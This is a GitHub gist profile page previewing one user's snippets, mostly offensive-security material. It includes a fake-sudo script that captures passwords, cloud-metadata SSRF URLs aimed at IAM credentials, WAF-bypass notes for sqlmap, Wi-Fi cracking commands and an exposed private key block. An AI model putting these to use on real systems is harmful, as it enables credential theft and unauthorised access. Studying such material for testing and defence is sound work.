Skip to content

Instantly share code, notes, and snippets.

View duraki's full-sized avatar

duraki

170 followers · 924 following
View GitHub Profile
@duraki
duraki / x.pem
Created August 6, 2020 10:30
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEApyp3B6Jd/yGzmogaq6a1CbEyz5i9EDSTrCWIQuXj+9JPic0LB+Aql3zCCDH3
IJFCOeofrXObVKTWpGvUYGFrk92LR05ZQkrMVV5ZjNPF0mxUqnktyoQte5GvAh9dbwu6b0dMImvr
W85nY7MtpbfYyxvup1YE9YPseGhiJhDtujXmUj5YMgX0wZzW2cNyOwN0dEjK/zFiuTLBvHEW9a82
JbvoKBhK/nMFwB09ZhG5ihfeLcevvoVmTRrHRvJbRqZpuQt6l4vQhUZsAJGPTwsI62M7KRdtqLy7
gLvajWc6DEAXdlD+MsjHW4ikDvWgnUCtPVBLFoK5q1uPAxU3fDNtRwIDAQABAoIBAEEu8tkcPBDn
QFSKq/Ow/rj3yrtecKKoDck7nWWQpRSlznQKazm39IO7lyGA8j9VxQA2RgHpqXEZEcVtcpPeiQdQ
hSXZ7D5IUmMbdknOrj2+FkmfFPb6EY40oYxvVIyfgyQvJgXqFQ1ob7JVxP/wr22Lx8Siay6dMZFG
CreTNE++YPwBDqnJbMZDM9SJb/R+f+2BZFd9OqNe50pADp6pBpOdcSeRw5su+vNl3FB2kxH8G8ob
1COpWk/7esngTRYK30Im0QKJC8wCMafZnJPw92Sx62zmaE+9RXD8tdaqeKbhkJDZfej6YH88NJQs
@duraki
duraki / sudo_phishing_payload.sh
Created June 10, 2020 07:54
# Create payload: replace sudo with an alias
payload='
fake_sudo() {
# Simulate a sudo prompt
echo -n "[sudo] password for ${USER}: "
read -s password
echo
# Run your command so you are happy
echo "$password" | sudo -S "$@"
# Do my evil stuff with your password
@duraki
duraki / script.sh
Created April 16, 2020 08:36
The first two statements of your BASH script should be…
#!/usr/bin/env bash
set -euo pipefail
@duraki
duraki / cloud_metadata.txt
Created January 7, 2020 22:09 — forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@duraki
duraki / sqlmap-tamper-scripts-evaluation.md
Created July 4, 2019 12:59 — forked from mgeeky/sqlmap-tamper-scripts-evaluation.md
SQLMap Tamper scripts evaluation against F5 Big-IP ASM WAF

SQLMap Tamper scripts evaluation against F5 Big-IP ASM WAF

The below table represents results of tests launched against F5 Big-IP ASM WAF appliance in it's XX version of YY and ZZ version of XY

Below names are to be passed to the --tamper= parameter of sqlmap.

The column Violation Rating represents most dominant rating of topmost 20 Requests observed by F5 in it's Security>>Event Logs:Application:Requests view.

The scale is 0-5.

@duraki
duraki / recon
Created March 25, 2019 20:28
Go the road less travelled, find programs that are not on hackerone or bugcrowd:
https://www.bugcrowd.com/bug-bounty-list/
google: "Responsible Disclosure" or "Vulnerability Disclosure" or "responsible disclosure website list"
google: responsible disclosure "bounty"
Responsible Disclosure seems to give best results.
intext:”Responsible Disclosure Policy”
"responsible disclosure" "private program"
"responsible disclosure" "private" "program"
Google Dork:
@duraki
duraki / Aircrack Commands
Created March 22, 2019 10:24 — forked from victorreyesh/Aircrack Commands
Cracking WPA2 / WEP Wifi / Aircrack 10 seconds guide. For Mac OSX
//Install Macports.
//Install aircrack-ng:
sudo port install aircrack-ng
//Install the latest Xcode, with the Command Line Tools.
//Create the following symlink:
sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/sbin/airport
//Figure out which channel you need to sniff:
sudo airport -s
sudo airport en1 sniff [CHANNEL]
@duraki
duraki / gist:cff95010c15a0ebcded372179b7b0f42
Created January 17, 2019 11:40 — forked from carnal0wnage/gist:606c41ac6ec40bf5c69d4db96d9312e3
Red Team Books
From: http://redteams.net/bookshelf/
Techie
Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp.
Social Engineering: The Art of Human Hacking by Christopher Hadnagy
Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam
The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick
Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others.
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor
The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors
@duraki
duraki / fix_macbook_air_redhat_linux_wifi.txt
Last active May 7, 2022 13:04
Wi-fi fix RHEL on Macbook Air
# => unload/load wl module
$ modprobe -r wl
$ modprobe wl
$ nmtui ...
# => show use across the linux
$ modprobe --show-depends wl
insmod /lib/modules/3.10.0-693.11.1.el7.x86_64/kernel/net/rfkill/rfkill.ko.xz
insmod /lib/modules/3.10.0-693.11.1.el7.x86_64/kernel/net/wireless/cfg80211.ko.xz
@duraki
duraki / web-servers.md
Created February 5, 2018 17:46 — forked from willurd/web-servers.md
Big list of http static server one-liners

Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.

Discussion on reddit.

Python 2.x

$ python -m SimpleHTTPServer 8000